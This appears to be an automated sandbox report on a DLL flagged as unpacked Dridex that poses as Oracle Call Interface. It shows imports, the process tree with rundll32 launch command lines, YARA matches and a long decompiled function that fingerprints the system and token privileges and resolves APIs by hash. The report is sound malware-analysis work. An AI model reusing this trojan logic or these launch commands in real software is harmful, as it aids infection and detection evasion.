                                                                                                                                                ADVAPI32.dllCreateRestrictedToken, CryptGenKey, CryptAcquireContextW, RegCloseKey, CryptContextAddRef
                                                                                                                                                GDI32.dllGetViewportOrgEx, SetWindowOrgEx
                                                                                                                                                pdh.dllPdhAddCounterW
                                                                                                                                                ole32.dllCoCreateInstanceEx, CoGetObjectContext, StringFromGUID2
                                                                                                                                                WINMM.dllwaveOutGetPitch
                                                                                                                                                SHLWAPI.dllAssocGetPerceivedType
                                                                                                                                                ESENT.dllJetInit

                                                                                                                                                Exports

                                                                                                                                                NameOrdinalAddress
                                                                                                                                                Wgpomsdeeomtunmdrt10x10078125

                                                                                                                                                Version Infos

                                                                                                                                                DescriptionData
                                                                                                                                                OriginalFilenameHen.dll
                                                                                                                                                FileDescriptionOracle Call Interface
                                                                                                                                                FileVersion7.0.2.1.0
                                                                                                                                                Legal CopyrightCopyright Oracle Corporation 1979, 2001. All rights reserved.
                                                                                                                                                CompanyNameOracle Corporation
                                                                                                                                                Translation0x0409 0x04b0

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                EnglishUnited States

                                                                                                                                                Network Behavior

                                                                                                                                                No network behavior found

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                Analysis Process: loaddll32.exe PID: 6400 Parent PID: 2924

                                                                                                                                                General

                                                                                                                                                Start time:17:27:03
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:loaddll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll"
                                                                                                                                                Imagebase:0x1320000
                                                                                                                                                File size:116736 bytes
                                                                                                                                                MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:moderate

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: cmd.exe PID: 5696 Parent PID: 6400

                                                                                                                                                General

                                                                                                                                                Start time:17:27:03
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                                                                                                                                                Imagebase:0xd80000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: rundll32.exe PID: 6340 Parent PID: 6400

                                                                                                                                                General

                                                                                                                                                Start time:17:27:04
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\L0mddDYjoL.dll,Wgpomsdeeomtunmdrt
                                                                                                                                                Imagebase:0xeb0000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000000.371795691.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000000.369759856.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: rundll32.exe PID: 4988 Parent PID: 5696

                                                                                                                                                General

                                                                                                                                                Start time:17:27:04
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:rundll32.exe "C:\Users\user\Desktop\L0mddDYjoL.dll",#1
                                                                                                                                                Imagebase:0xeb0000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000000.363470341.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000002.389367218.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000000.365127503.000000006E9A1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: WerFault.exe PID: 5924 Parent PID: 4988

                                                                                                                                                General

                                                                                                                                                Start time:17:27:41
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 728
                                                                                                                                                Imagebase:0x1000000
                                                                                                                                                File size:434592 bytes
                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Analysis Process: WerFault.exe PID: 5652 Parent PID: 6340

                                                                                                                                                General

                                                                                                                                                Start time:17:27:44
                                                                                                                                                Start date:26/12/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6340 -s 848
                                                                                                                                                Imagebase:0x1000000
                                                                                                                                                File size:434592 bytes
                                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Chronological Activities

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >

                                                                                                                                                  Analysis Process: loaddll32.exe PID: 6400 Parent PID: 2924 loaddll32.exeCOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 6E9B0730, Relevance: 5.2, APIs: 3, Instructions: 650COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                  			E6E9B0730(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e9bd1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6E9B361C(0x30);
					 *0x6e9bd1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E9B3698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E9B306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e9bd1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E9B0FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e9bd1f8 + 0xb)) = _t162;
					_t363 = E6E9B306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e9bd1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E9B0730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e9bbce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E9AF584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E9AF828(_t429 + 0x24, E6E9AF4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E9AF4BC(_t429 + 0x24, E6E9AF4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E9B5580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E9AF654(_t429 + 0x20);
							E6E9B55B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6E9B5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E9ADFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E9B55B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6E9B5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E9ADFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E9B55B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6E9B5864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E9ADFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E9ACFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E9B5558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E9ACFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E9B5558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E9ACFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E9B5558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E9ACFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E9B5558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E9ACFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E9B5558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E9ACFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E9B5558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e9bd1f8 + 0x24)) = _t189;
							_t190 = E6E9B1030(0xffffffffffffffff);
							_t320 =  *0x6e9bd1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e9bd1f8 + 0x2c)) = E6E9B10A4(0xffffffffffffffff);
								L78:
								if(E6E9B306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e9bd1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E9B306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e9bd1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E9B35F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E9B35F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E9AF584(_t429 + 0x18c, _t206);
								_t411 = E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E9AF654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E9AF4BC(_t429 + 0x18c, 0);
								_t213 = E6E9AF4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E9B35F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E9AF4BC(_t429 + 0x18c, 0);
								E6E9ADF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E9B306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E9ADFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E9B306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E9AE06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E9B4FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E9AE8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E9ADFA4(_t429 + 0x1b8);
								E6E9ADFA4(_t429 + 0x1b0);
								E6E9AF654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E9ABB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e9bd1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E9ABB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E9B35F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E9B35F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E9AF584(_t429 + 0x3c, _t262);
						_t265 = E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E9AF654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E9AF4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E9AF4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E9B35F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E9AF4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E9B306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E9B35F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E9B0FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E9B306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E9B0FD4(_t403, _t413, _t403);
								}
								E6E9AF654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E9ABB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E9ABB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}


































































                                                                                                                                                  0x6e9b073f
                                                                                                                                                  0x6e9b0741
                                                                                                                                                  0x6e9b0748
                                                                                                                                                  0x6e9b0fc7
                                                                                                                                                  0x6e9b0fcd
                                                                                                                                                  0x6e9b0fcd
                                                                                                                                                  0x6e9b0752
                                                                                                                                                  0x6e9b075e
                                                                                                                                                  0x6e9b076a
                                                                                                                                                  0x6e9b076f
                                                                                                                                                  0x6e9b077c
                                                                                                                                                  0x6e9b078d
                                                                                                                                                  0x6e9b078f
                                                                                                                                                  0x6e9b0790
                                                                                                                                                  0x6e9b0791
                                                                                                                                                  0x6e9b0791
                                                                                                                                                  0x6e9b0792
                                                                                                                                                  0x6e9b0796
                                                                                                                                                  0x6e9b079a
                                                                                                                                                  0x6e9b079f
                                                                                                                                                  0x6e9b07a2
                                                                                                                                                  0x6e9b07a8
                                                                                                                                                  0x6e9b07c2
                                                                                                                                                  0x6e9b07c9
                                                                                                                                                  0x6e9b07cc
                                                                                                                                                  0x6e9b07cf
                                                                                                                                                  0x6e9b07d1
                                                                                                                                                  0x6e9b07dd
                                                                                                                                                  0x6e9b07ea
                                                                                                                                                  0x6e9b07f7
                                                                                                                                                  0x6e9b07fb
                                                                                                                                                  0x6e9b0887
                                                                                                                                                  0x6e9b0887
                                                                                                                                                  0x6e9b0889
                                                                                                                                                  0x6e9b088d
                                                                                                                                                  0x6e9b0898
                                                                                                                                                  0x6e9b08ae
                                                                                                                                                  0x6e9b08b1
                                                                                                                                                  0x6e9b08b1
                                                                                                                                                  0x6e9b08b5
                                                                                                                                                  0x6e9b08be
                                                                                                                                                  0x6e9b08c3
                                                                                                                                                  0x6e9b08c3
                                                                                                                                                  0x6e9b08c5
                                                                                                                                                  0x6e9b08d6
                                                                                                                                                  0x6e9b08f8
                                                                                                                                                  0x6e9b08fa
                                                                                                                                                  0x6e9b08fb
                                                                                                                                                  0x6e9b08ff
                                                                                                                                                  0x6e9b08ff
                                                                                                                                                  0x6e9b0908
                                                                                                                                                  0x6e9b0914
                                                                                                                                                  0x6e9b091d
                                                                                                                                                  0x6e9b0933
                                                                                                                                                  0x6e9b0943
                                                                                                                                                  0x6e9b0948
                                                                                                                                                  0x6e9b094c
                                                                                                                                                  0x6e9b0951
                                                                                                                                                  0x6e9b0953
                                                                                                                                                  0x6e9b09a3
                                                                                                                                                  0x6e9b09b8
                                                                                                                                                  0x6e9b09bc
                                                                                                                                                  0x6e9b09c1
                                                                                                                                                  0x6e9b09d2
                                                                                                                                                  0x6e9b09e7
                                                                                                                                                  0x6e9b09eb
                                                                                                                                                  0x6e9b09f0
                                                                                                                                                  0x6e9b09f2
                                                                                                                                                  0x6e9b0a39
                                                                                                                                                  0x6e9b0a3c
                                                                                                                                                  0x6e9b0a8a
                                                                                                                                                  0x6e9b0a8d
                                                                                                                                                  0x6e9b0ace
                                                                                                                                                  0x6e9b0ad2
                                                                                                                                                  0x6e9b0ad7
                                                                                                                                                  0x6e9b0adc
                                                                                                                                                  0x6e9b0afb
                                                                                                                                                  0x6e9b0afb
                                                                                                                                                  0x6e9b0afb
                                                                                                                                                  0x6e9b0afd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0afd
                                                                                                                                                  0x6e9b0ade
                                                                                                                                                  0x6e9b0ae2
                                                                                                                                                  0x6e9b0ae4
                                                                                                                                                  0x6e9b0aeb
                                                                                                                                                  0x6e9b0aeb
                                                                                                                                                  0x6e9b0af1
                                                                                                                                                  0x6e9b0af1
                                                                                                                                                  0x6e9b0af3
                                                                                                                                                  0x6e9b0af6
                                                                                                                                                  0x6e9b0af6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0af3
                                                                                                                                                  0x6e9b0ae6
                                                                                                                                                  0x6e9b0ae9
                                                                                                                                                  0x6e9b0aef
                                                                                                                                                  0x6e9b0aef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0aef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0ae9
                                                                                                                                                  0x6e9b0a8f
                                                                                                                                                  0x6e9b0a92
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a98
                                                                                                                                                  0x6e9b0a9d
                                                                                                                                                  0x6e9b0aa2
                                                                                                                                                  0x6e9b0ac1
                                                                                                                                                  0x6e9b0ac1
                                                                                                                                                  0x6e9b0acb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0acb
                                                                                                                                                  0x6e9b0aa4
                                                                                                                                                  0x6e9b0aa8
                                                                                                                                                  0x6e9b0aaa
                                                                                                                                                  0x6e9b0ab1
                                                                                                                                                  0x6e9b0ab1
                                                                                                                                                  0x6e9b0ab7
                                                                                                                                                  0x6e9b0ab7
                                                                                                                                                  0x6e9b0ab9
                                                                                                                                                  0x6e9b0abc
                                                                                                                                                  0x6e9b0abc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0ab9
                                                                                                                                                  0x6e9b0aac
                                                                                                                                                  0x6e9b0aaf
                                                                                                                                                  0x6e9b0ab5
                                                                                                                                                  0x6e9b0ab5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0ab5
                                                                                                                                                  0x00000000
